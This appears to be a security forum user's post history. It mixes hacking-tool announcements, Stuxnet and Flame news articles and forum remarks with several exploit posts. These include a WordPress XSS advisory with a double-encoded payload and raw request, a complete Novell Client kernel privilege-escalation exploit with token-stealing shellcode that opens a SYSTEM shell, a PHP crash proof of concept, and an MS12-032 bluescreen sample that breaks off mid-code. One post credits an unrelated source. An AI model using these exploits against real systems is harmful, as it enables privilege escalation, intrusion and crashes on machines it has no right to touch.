Everything posted by Nytro
-
Reaver v1.4 - WPS Brute force attack against Wifi

The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours.

Screenshot: http://2.bp.blogspot.com/-x1sTEFZqpvU/T85ITbIGQ3I/AAAAAAAAGfE/Dqh7dgJUGvY/s1600/Reaver+v1.4+-+WPS+Brute+force+attack+against+Wifi.jpg

Usage is simple; just specify the target BSSID and the monitor mode interface to use:

# reaver -i mon0 -b 00:01:02:03:04:05

For those interested, there is also a commercial version available with more features and speed improvements. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Download Reaver v1.4

Source: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools
-
Windows 7, powerful malware, "open-source", Fully UnDetectable: PowerShell
-
WordPress 3.3.2 Cross Site Scripting
Authored by old man

WordPress version 3.3.2 suffers from a double-encoding cross site scripting vulnerability that bypasses the protection filter.

There is a persistent XSS vulnerability in WordPress version 3.3.2. However, the severity of this finding is very LOW. The details are as follows:

a) Log into an admin account
b) Navigate to Links -> Links Categories
c) Fill in the required details and intercept the request with Burp Suite.
d) The injectable parameter is slug.

If you inject <script>alert(1)</script> as the value of parameter "slug", the application strips it off and the value becomes alert1. But if the payload is double encoded then ;-) <script>alert(1)</script>, when converted to %253cscript%253ealert%25281%2529%253c%252fscript%253e, bypasses the XSS protection.

The following request shows the raw Burp request along with the vulnerable parameter and payload marked in bold.

BURP REQUEST

POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b; wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb
Content-Type: application/x-www-form-urlencoded
Content-Length: 379

action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update

Source: WordPress 3.3.2 Cross Site Scripting - Packet Storm
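Why the double-encoded slug slips past the filter, as an added example that is not from the advisory or from WordPress's own code: a hypothetical tag-stripping filter stands in for the slug filter (it only removes things shaped like <...>), applied once to the singly-decoded form value versus after percent-decoding to a fixed point, with HTML escaping at output as the second layer of defence.

```python
import html
import re
from urllib.parse import unquote

# Constructed from the advisory's payload: the double-encoded slug as sent on
# the wire, and the same value after the web server's single decode of the
# form body, which is what the application code actually receives.
ON_THE_WIRE = "injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e"
AS_SEEN_BY_APP = unquote(ON_THE_WIRE)  # injecthere%3cscript%3ealert%281%29%3c%2fscript%3e

TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value):
    """Hypothetical stand-in for the slug filter: drops anything shaped like <...>.
    It is not WordPress's sanitize code, only a model of a filter that looks for '<'."""
    return TAG_RE.sub("", value)


def naive_store(value):
    """Vulnerable pattern: filter the value exactly as received.

    Only one encoding layer has been removed by the server, so the string holds
    '%3c' rather than '<', the filter finds nothing to strip, and the still
    encoded payload is stored verbatim."""
    return strip_tags(value)


def canonicalize(value, max_rounds=8):
    """Percent-decode until the string stops changing, so every layer of
    encoding is peeled off before any security decision is taken."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers; rejecting input")


def hardened_store(value):
    """Fix 1: canonicalize first, then filter on the canonical form."""
    return strip_tags(canonicalize(value))


def render_unsafe(stored):
    """Output path that decodes once more and emits raw HTML: this is where a
    stored, still-encoded payload turns back into a live <script> element."""
    return unquote(stored)


def render_safe(stored):
    """Fix 2 (defence in depth): escape for the HTML context at output time,
    whatever the input filter let through."""
    return html.escape(unquote(stored), quote=True)


def contains_script(markup):
    """Detection helper: does the rendered markup carry a script element?"""
    return "<script>" in markup.lower()


if __name__ == "__main__":
    print("naive  :", render_unsafe(naive_store(AS_SEEN_BY_APP)))
    print("fix 1  :", render_unsafe(hardened_store(AS_SEEN_BY_APP)))
    print("fix 2  :", render_safe(naive_store(AS_SEEN_BY_APP)))
```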
-
Yes, maybe. These are the kind of people I idolize.
-
[h=1]nullcon Goa 2012: HaxdroiD Empowering Handsets - By Anant & Pardhu[/h] As already proven by recent trends, the next wave will be the mobile computing wave, and so will be the shift of platform for penetration testing. Although Android is targeted as the next generation computing platform, it still lacks the capability to perform VA / PT / ethical hacking on it. If we look at the Android market we find it lacking in lots of terms: not much of a tool set available and not much documentation available online either. This paper will discuss various options that are available for converting an innocent Android handset into a penetration testing platform. This talk will evaluate the current scenario and also present the various options that are available for people. Not just the existing tool set: we will also be exploring ways and means to explore and exploit the Android platform to the limits. We will also be publishing a customized Android ROM which is a direct attack platform. It will have an advanced feature set pre-configured and ready to use, saving large efforts of security researchers. (This ROM will be published for two different handset models, however it will have options to be ported to just about any handset/tablet which can handle the load.) Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: Attacking Backup Software - By Nibin Varghese[/h] Backup software is a valuable asset for any organization. This software runs on a large number of systems in an enterprise. Its main functionality is to provide backup and recovery options for the critical data that belongs to the enterprise. The hosts requiring these backup services communicate with a backup server over the network. The different modes of operation between the server and client would be a pull model, where the server connects to the client, or a push model, where the client connects to the server. If the communication between the server and client is not validated properly, there can be different vectors of attack that can be conducted on this software. This paper would explain an attack on Symantec backup software (CVE-2011-0546, BID:47824) where it was possible to do a man in the middle attack to steal information from host machines. The bug was very critical and complex as it affected a major architectural flaw of the application in how it validated the host machines before a backup operation was initiated. Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: IVR Security Internal Network Attacks via Phone - By Rahul Sasi[/h] The following research is on IVR (Interactive Voice Response) systems, which are currently used in phone banking, call centers, hospitals and corporates, mainly for information retrieval and remote management via telephone lines. The paper explains a series of security issues concerning these systems (IVR), exploitation techniques and ways of carrying out attacks on the internal network via telephone lines. A demonstration of a few exploits on IVR systems and a real incident about a critical, responsibly disclosed flaw in a bank's Phone Banking System would be done. Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: Binary God - By Atul Alex[/h] The talk is about an abstract processor named Aod8 designed by Atul. The idea is to emulate an abstract design at the programming level. The objective of this research was to understand the basics of designing a processor architecture, creating a custom assembler for this architecture to write programs for it, writing your own debugger & creating a very basic operating system for it. The speaker will be demonstrating the tools that he has created for the same, and will explain how he wrote the operating system, the idea behind writing the debugger & the assembler, and concepts of handling the memory & bypassing size limitations of the architecture. Source: nullOxOO - YouTube
-
[h=1]nullcon Goa 2012: Attacking and Defending the Smart Grid - By Justin Searle[/h] The Smart Grid brings greater benefits for electric utilities and customers alike; however, these benefits come at a cost from a security perspective. Unlike the over-hyped messages we usually hear from the media, the sky is NOT falling. However, just like any other technology, the systems and devices that make up the Smart Grid will have weaknesses and vulnerabilities. It is important for us to understand these vulnerabilities, how they can be attacked, and what we need to do to defend against those attacks. This presentation will explore the architecture of most Smart Meters, explain the methodologies developed to perform penetration testing on them, enumerate the types of vulnerabilities we commonly find, and discuss the solutions/recommendations. Source: nullOxOO - YouTube
-
Interesting: http://www.nytimes.com/interactive/2012/06/01/world/middleeast/how-a-secret-cyberwar-program-worked.html?src=tp
-
[h=1]Obama Order Sped Up Wave of Cyberattacks Against Iran[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: June 1, 2012[/h]

WASHINGTON — From his first months in office, President Obama secretly ordered increasingly sophisticated attacks on the computer systems that run Iran’s main nuclear enrichment facilities, significantly expanding America’s first sustained use of cyberweapons, according to participants in the program.

Mr. Obama decided to accelerate the attacks — begun in the Bush administration and code-named Olympic Games — even after an element of the program accidentally became public in the summer of 2010 because of a programming error that allowed it to escape Iran’s Natanz plant and sent it around the world on the Internet. Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet.

At a tense meeting in the White House Situation Room within days of the worm’s “escape,” Mr. Obama, Vice President Joseph R. Biden Jr. and the director of the Central Intelligence Agency at the time, Leon E. Panetta, considered whether America’s most ambitious attempt to slow the progress of Iran’s nuclear efforts had been fatally compromised.

“Should we shut this thing down?” Mr. Obama asked, according to members of the president’s national security team who were in the room.

Told it was unclear how much the Iranians knew about the code, and offered evidence that it was still causing havoc, Mr. Obama decided that the cyberattacks should proceed. In the following weeks, the Natanz plant was hit by a newer version of the computer worm, and then another after that. The last of that series of attacks, a few weeks after Stuxnet was detected around the world, temporarily took out nearly 1,000 of the 5,000 centrifuges Iran had spinning at the time to purify uranium.

This account of the American and Israeli effort to undermine the Iranian nuclear program is based on interviews over the past 18 months with current and former American, European and Israeli officials involved in the program, as well as a range of outside experts. None would allow their names to be used because the effort remains highly classified, and parts of it continue to this day.

These officials gave differing assessments of how successful the sabotage program was in slowing Iran’s progress toward developing the ability to build nuclear weapons. Internal Obama administration estimates say the effort was set back by 18 months to two years, but some experts inside and outside the government are more skeptical, noting that Iran’s enrichment levels have steadily recovered, giving the country enough fuel today for five or more weapons, with additional enrichment.

Whether Iran is still trying to design and build a weapon is in dispute. The most recent United States intelligence estimate concludes that Iran suspended major parts of its weaponization effort after 2003, though there is evidence that some remnants of it continue.

Iran initially denied that its enrichment facilities had been hit by Stuxnet, then said it had found the worm and contained it. Last year, the nation announced that it had begun its own military cyberunit, and Brig. Gen. Gholamreza Jalali, the head of Iran’s Passive Defense Organization, said that the Iranian military was prepared “to fight our enemies” in “cyberspace and Internet warfare.” But there has been scant evidence that it has begun to strike back.

The United States government only recently acknowledged developing cyberweapons, and it has never admitted using them. There have been reports of one-time attacks against personal computers used by members of Al Qaeda, and of contemplated attacks against the computers that run air defense systems, including during the NATO-led air attack on Libya last year.

But Olympic Games was of an entirely different type and sophistication. It appears to be the first time the United States has repeatedly used cyberweapons to cripple another country’s infrastructure, achieving, with computer code, what until then could be accomplished only by bombing a country or sending in agents to plant explosives. The code itself is 50 times as big as the typical computer worm, Carey Nachenberg, a vice president of Symantec, one of the many groups that have dissected the code, said at a symposium at Stanford University in April. Those forensic investigations into the inner workings of the code, while picking apart how it worked, came to no conclusions about who was responsible.

A similar process is now under way to figure out the origins of another cyberweapon called Flame that was recently discovered to have attacked the computers of Iranian officials, sweeping up information from those machines. But the computer code appears to be at least five years old, and American officials say that it was not part of Olympic Games. They have declined to say whether the United States was responsible for the Flame attack.

Mr. Obama, according to participants in the many Situation Room meetings on Olympic Games, was acutely aware that with every attack he was pushing the United States into new territory, much as his predecessors had with the first use of atomic weapons in the 1940s, of intercontinental missiles in the 1950s and of drones in the past decade. He repeatedly expressed concerns that any American acknowledgment that it was using cyberweapons — even under the most careful and limited circumstances — could enable other countries, terrorists or hackers to justify their own attacks.

“We discussed the irony, more than once,” one of his aides said. Another said that the administration was resistant to developing a “grand theory for a weapon whose possibilities they were still discovering.” Yet Mr. Obama concluded that when it came to stopping Iran, the United States had no other choice.

If Olympic Games failed, he told aides, there would be no time for sanctions and diplomacy with Iran to work. Israel could carry out a conventional military attack, prompting a conflict that could spread throughout the region.

[h=3]A Bush Initiative[/h]

The impetus for Olympic Games dates from 2006, when President George W. Bush saw few good options in dealing with Iran. At the time, America’s European allies were divided about the cost that imposing sanctions on Iran would have on their own economies. Having falsely accused Saddam Hussein of reconstituting his nuclear program in Iraq, Mr. Bush had little credibility in publicly discussing another nation’s nuclear ambitions.

The Iranians seemed to sense his vulnerability, and, frustrated by negotiations, they resumed enriching uranium at an underground site at Natanz, one whose existence had been exposed just three years before. Iran’s president, Mahmoud Ahmadinejad, took reporters on a tour of the plant and described grand ambitions to install upward of 50,000 centrifuges.

For a country with only one nuclear power reactor — whose fuel comes from Russia — to say that it needed fuel for its civilian nuclear program seemed dubious to Bush administration officials. They feared that the fuel could be used in another way besides providing power: to create a stockpile that could later be enriched to bomb-grade material if the Iranians made a political decision to do so.

Hawks in the Bush administration like Vice President Dick Cheney urged Mr. Bush to consider a military strike against the Iranian nuclear facilities before they could produce fuel suitable for a weapon. Several times, the administration reviewed military options and concluded that they would only further inflame a region already at war, and would have uncertain results.

For years the C.I.A. had introduced faulty parts and designs into Iran’s systems — even tinkering with imported power supplies so that they would blow up — but the sabotage had had relatively little effect. General James E. Cartwright, who had established a small cyberoperation inside the United States Strategic Command, which is responsible for many of America’s nuclear forces, joined intelligence officials in presenting a radical new idea to Mr. Bush and his national security team. It involved a far more sophisticated cyberweapon than the United States had designed before.

The goal was to gain access to the Natanz plant’s industrial computer controls. That required leaping the electronic moat that cut the Natanz plant off from the Internet — called the air gap, because it physically separates the facility from the outside world. The computer code would invade the specialized computers that command the centrifuges.

The first stage in the effort was to develop a bit of computer code called a beacon that could be inserted into the computers, which were made by the German company Siemens and an Iranian manufacturer, to map their operations. The idea was to draw the equivalent of an electrical blueprint of the Natanz plant, to understand how the computers control the giant silvery centrifuges that spin at tremendous speeds. The connections were complex, and unless every circuit was understood, efforts to seize control of the centrifuges could fail.

........................

Full article: http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1
-
[h=1]Why Antivirus Companies Like Mine Failed to Catch Flame and Stuxnet[/h] By Mikko Hypponen, June 1, 2012

A couple of days ago, I received an e-mail from Iran. It was sent by an analyst from the Iranian Computer Emergency Response Team, and it was informing me about a piece of malware their team had found infecting a variety of Iranian computers. This turned out to be Flame: the malware that has now been front-page news worldwide.

When we went digging through our archive for related samples of malware, we were surprised to find that we already had samples of Flame, dating back to 2010 and 2011, that we were unaware we possessed. They had come through automated reporting mechanisms, but had never been flagged by the system as something we should examine closely. Researchers at other antivirus firms have found evidence that they received samples of the malware even earlier than this, indicating that the malware was older than 2010.

What this means is that all of us had missed detecting this malware for two years, or more. That’s a spectacular failure for our company, and for the antivirus industry in general.

It wasn’t the first time this has happened, either. Stuxnet went undetected for more than a year after it was unleashed in the wild, and was only discovered after an antivirus firm in Belarus was called in to look at machines in Iran that were having problems. When researchers dug back through their archives for anything similar to Stuxnet, they found that a zero-day exploit that was used in Stuxnet had been used before with another piece of malware, but had never been noticed at the time. A related malware called Duqu also went undetected by antivirus firms for over a year.

Stuxnet, Duqu and Flame are not normal, everyday malware, of course. All three of them were most likely developed by a Western intelligence agency as part of covert operations that weren’t meant to be discovered. The fact that the malware evaded detection proves how well the attackers did their job. In the case of Stuxnet and Duqu, they used digitally signed components to make their malware appear to be trustworthy applications. And instead of trying to protect their code with custom packers and obfuscation engines — which might have drawn suspicion to them — they hid in plain sight. In the case of Flame, the attackers used SQLite, SSH, SSL and LUA libraries that made the code look more like a business database system than a piece of malware.

Someone might argue that it’s good we failed to find these pieces of code. Most of the infections occurred in politically turbulent areas of the world, in countries like Iran, Syria and Sudan. It’s not known exactly what Flame was used for, but it’s possible that if we had detected and blocked it earlier, we might have indirectly helped oppressive regimes in these countries thwart the efforts of foreign intelligence agencies to monitor them.

But that’s not the point. We want to detect malware, regardless of its source or purpose. Politics don’t even enter the discussion, nor should they. Any malware, even targeted, can get out of hand and cause “collateral damage” to machines that aren’t the intended victim. Stuxnet, for example, spread around the world via its USB worm functionality and infected more than 100,000 computers while seeking out its real target, computers operating the Natanz uranium enrichment facility in Iran. In short, it’s our job as an industry to protect computers against malware. That’s it.

Yet we failed to do that with Stuxnet and Duqu and Flame. This makes our customers nervous.

The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose. And the zero-day exploits used in these attacks are unknown to antivirus companies by definition. As far as we can tell, before releasing their malicious codes to attack victims, the attackers tested them against all of the relevant antivirus products on the market to make sure that the malware wouldn’t be detected. They have unlimited time to perfect their attacks. It’s not a fair war between the attackers and the defenders when the attackers have access to our weapons.

Antivirus systems need to strike a balance between detecting all possible attacks without causing any false alarms. And while we try to improve on this all the time, there will never be a solution that is 100 percent perfect. The best available protection against serious targeted attacks requires a layered defense, with network intrusion detection systems, whitelisting against known malware and active monitoring of inbound and outbound traffic of an organization’s network.

This story does not end with Flame. It’s highly likely there are other similar attacks already underway that we haven’t detected yet. Put simply, attacks like these work.

Flame was a failure for the antivirus industry. We really should have been able to do better. But we didn’t. We were out of our league, in our own game.

Source: Why Antivirus Companies Like Mine Failed to Catch Flame and Stuxnet | Threat Level | Wired.com
-
Not very detailed, but as presentations they're OK.
-
For "Cancan" (gossip) type topics, use the "Cosul de gunoi" (Trash Can) category. Thank you.
-
You have a post on your blog: Shell | TuR334VL Blog. It says: "@author TuR334VL". And I found this: ?><?php /** * @author Ikram ALI * @copyright 2012 */ @de - Pastebin.com, which looks a lot like what you say you made. Conclusion: ban. People like you, who don't know how to give credit for other people's work, who boast about other people's work and steal it, have no business here.
-
Nmap Port Scanner 6.00
Authored by Fyodor | Site insecure.org

Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, and detection of down hosts via parallel pings.

Changes: NSE has been enhanced, there is better web scanning, full IPv6 support added, a new nping tool, better zenmap gui, and faster scans. First major release since 2009.

Download: http://packetstormsecurity.org/files/download/112951/nmap-6.00.tgz

Source: Nmap Port Scanner 6.00 - Packet Storm
-
Link: http://packetlife.net/library/cheat-sheets/
-
[h=1]Novell Client 4.91 SP4 Privilege Escalation Exploit[/h]Author: sickness

# Novell Client 4.91 SP3/4 Privilege escalation exploit
# Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~
#
# SecurityFocus: http://www.securityfocus.com/bid/27209/info
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762
# Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~
#
# Author: sickness@offensive-security.com
# Version Tested: Novell Client 4.91 SP4
# Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1)
# Thanks:
# - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible.
# - ryujin for the help while developing the exploit.

from ctypes import *
import sys,struct,os
from optparse import OptionParser

kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi

def GetBase(drvname=None):
    EVIL_ARRAY = 1024
    myarray = c_ulong * EVIL_ARRAY
    lpImageBase = myarray()
    cb = c_int(1024)
    lpcbNeeded = c_long()
    drivername_size = c_long()
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
    for baseaddr in lpImageBase:
        drivername = c_char_p("\x00"*drivername_size.value)
        if baseaddr:
            Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername, drivername_size.value)
            if drvname:
                if drivername.value.lower() == drvname:
                    print "[>] Retrieving %s information." % drvname
                    print "[>] %s base address: %s" % (drvname, hex(baseaddr))
                    return baseaddr
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[>] Retrieving Kernel information."
                    print "[>] Kernel version: ", drivername.value
                    print "[>] Kernel base address: %s" % hex(baseaddr)
                    return (baseaddr, drivername.value)
    return None

if __name__ == '__main__':
    usage = "%prog -o <target>"
    parser = OptionParser(usage=usage)
    parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: XP, 2K3")
    (options, args) = parser.parse_args()
    OS = options.target_os
    if not OS or OS.upper() not in ['XP','2K3']:
        parser.print_help()
        sys.exit()
    OS = OS.upper()

    GENERIC_READ = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    DEVICE = '\\\\.\\nicm'
    device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)

    (krnlbase, kernelver) = GetBase()
    hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
    HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
    HalDispatchTable -= hKernel
    HalDispatchTable += krnlbase
    HalBase = GetBase("hal.dll")
    print "[>] HalDispatchTable address:", hex(HalDispatchTable)

    HalDispatchTable0x4 = HalDispatchTable + 0x4
    HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4
    HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10

    if OS == "2K3":
        HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003
        HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003
    else:
        HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP
        HalpSetSystemInformation = HalBase + 0x19436 # Offset for XP

    print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
    print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)

    EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL
    retn = c_ulong()
    inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite
    inut_size = 0x0
    output_buffer = 0x41414141 # Junk
    output_size = 0x0

    # Get offsets
    if OS == "2K3":
        _KPROCESS = "\x38" # Offset for 2003
        _TOKEN = "\xd8" # Offset for 2003
        _UPID = "\x94" # Offset for 2003
        _APLINKS = "\x98" # Offset for 2003
    else:
        _KPROCESS = "\x44" # Offset for XP
        _TOKEN = "\xc8" # Offset for XP
        _UPID = "\x84" # Offset for XP
        _APLINKS = "\x88" # Offset for XP

    # Restore the pointer
    pointer_restore = "\x31\xc0" + \
    "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
    "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
    "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
    "\xa3" + struct.pack("L", HalDispatchTable0x4)

    # Make the evil token stealing
    steal_token = "\x52" +\
    "\x53" +\
    "\x33\xc0" +\
    "\x64\x8b\x80\x24\x01\x00\x00" +\
    "\x8b\x40" + _KPROCESS +\
    "\x8b\xc8" +\
    "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
    "\x89\x1d\x00\x09\x02\x00" +\
    "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
    "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
    "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
    "\x75\xe8" +\
    "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
    "\x8b\xc1" +\
    "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
    "\x5b" +\
    "\x5a" +\
    "\xc2\x10"

    # Build the shellcode
    sc = "\x90" * 100
    sc+= pointer_restore + steal_token
    sc+= "\x90" * 100

    if OS == "2K3":
        baseadd = c_int(0x02a6ba10)
    else:
        baseadd = c_int(0x026e7bb0)

    MEMRES = (0x1000 | 0x2000)
    PAGEEXE = 0x00000040
    Zero_Bits = c_int(0)
    RegionSize = c_int(0x1000)
    write = c_int(0)

    dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)

    if OS == "2K3":
        kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write))
    else:
        kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write))

    if device_handler:
        print "[>] Sending IOCTL to the driver."
        dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)
        evil_in = c_ulong()
        evil_out = c_ulong()
        evil_in = 0x1337
        hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out))
        print "[>] Launching shell as SYSTEM."
        os.system("cmd.exe /K cd c:\\windows\\system32")

Source: Novell Client 4.91 SP4 Privilege Escalation Exploit
-
[h=1]PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference[/h]

<?php
/*
PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference

Author : condis
Date : 10.04.2012 AD
Website : http://cond.psychodela.pl
----
Download : http://php.net/downloads.php

Tested on:
PHP 5.3.8 + Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0 + Windows XP SP3 Professional PL
PHP 5.4.3 + Windows XP SP3 Professional PL

Description:
The wddx_serialize_value and wddx_serialize_vars functions fail to handle a Variant object when it is given as the first argument.

Registers:
EAX 00000000
ECX 1056AAE8 php5ts.1056AAE8
EDX 100EFCE0 php5ts.100EFCE0
EBX 01032AB0
ESP 00C0FAE0
EBP 00000000
ESI 0121E478
EDI 0121CB50
EIP 1028F22E php5ts.1028F22E

Crash:
1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25]

The situation looks pretty much the same for both wddx_serialize_vars and wddx_serialize_value.

Also the functions stream_bucket_prepend and stream_bucket_append have some problems handling a Variant object when it is given as the second argument:

stream_bucket_append(1, new Variant(1));
stream_bucket_prepend(1, new Variant(1));

PS : The Variant object is only available in PHP for Windows OS and it was implemented in PHP > 4.1.0 and PHP 5.
For more details check : http://php.net/manual/en/class.variant.php

PS2: After running this via the webserver my Apache wasn't able to handle requests anymore and I had to restart it
kthxbye
*/

wddx_serialize_value(new Variant(666));
?>

Source: PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference
-
It's meant to send HTTP requests with JavaScript (jsHTTP). See the source.
-
Windows 8 operating system will ban Firefox and Chrome
Nytro replied to ionut97's topic in Stiri securitate
Mozilla and Google should port their browsers to ARM as well, and I don't think there will be any problems. If I were Microsoft I would piss on Mozilla and Google and wouldn't add any "Browser choice" at all; let Mozilla build its own operating system, and let Google add a "Browser choice" to Android, since maybe I want to use Internet Explorer on Android, that's my business. So screw the demands Mozilla and Google are coming with.
-
Wouldn't you rather get banned from the forum instead of ending up in prison over some crap?
-
[h=3]WebVulScan - web application vulnerability scanner[/h][h=2]May 13, 2012[/h]

WebVulScan is a web application vulnerability scanner. It is a web application itself, written in PHP, and can be used to test remote or local web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated for the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found. After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.

The vulnerabilities tested by WebVulScan are:
Reflected Cross-Site Scripting
Stored Cross-Site Scripting
Standard SQL Injection
Broken Authentication using SQL Injection
Autocomplete Enabled on Password Fields
Potentially Insecure Direct Object References
Directory Listing Enabled
HTTP Banner Disclosure
SSL Certificate not Trusted
Unvalidated Redirects

Features:
Crawler: Crawls a website to identify and display all URLs belonging to the website.
Scanner: Crawls a website and scans all URLs found for vulnerabilities.
Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
Register: Allows a user to register with the web application.
Login: Allows a user to log in to the web application.
Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
PDF Generation: Dynamically generates a detailed PDF report.
Report Delivery: The PDF report is emailed to the user as an attachment.

This software was developed, and should only be used, entirely for ethical purposes. Running security testing tools such as this on a website (web application) could damage it. In order to stay ethical, you must ensure you have permission of the owners before testing a website (web application). Testing the security of a website (web application) without authorisation is unethical and against the law in many countries.

Download: https://code.google.com/p/webvulscan/downloads/list
Source: https://code.google.com/p/webvulscan/
Via: Defcamp
-
MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege

Microsoft update release: Microsoft Security Bulletin MS12-032 - Important : Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338)

Possible MS12-032 proof of concept from StackOverflow, thx to @avivra:

We discovered that running our application under certain conditions results in a Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to an IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds of running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.

    // the program attempts to bind to an IPv6-mapped IPv4 address
    // in a tight loop. If the address is not configured on the machine
    // running the program, it crashes Windows Server 2008 R2 (if the program is 32-bit)
    //
    // The header names were stripped from the post as extracted; the ones the
    // code requires (Winsock 2, IPv6 address types, printf/exit, bool) are restored here.
    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdbool.h>
    #pragma comment(lib, "ws2_32.lib")   // link against Winsock 2 under MSVC

    #define IPV6_V6ONLY 27

    void MyWsaStartup()
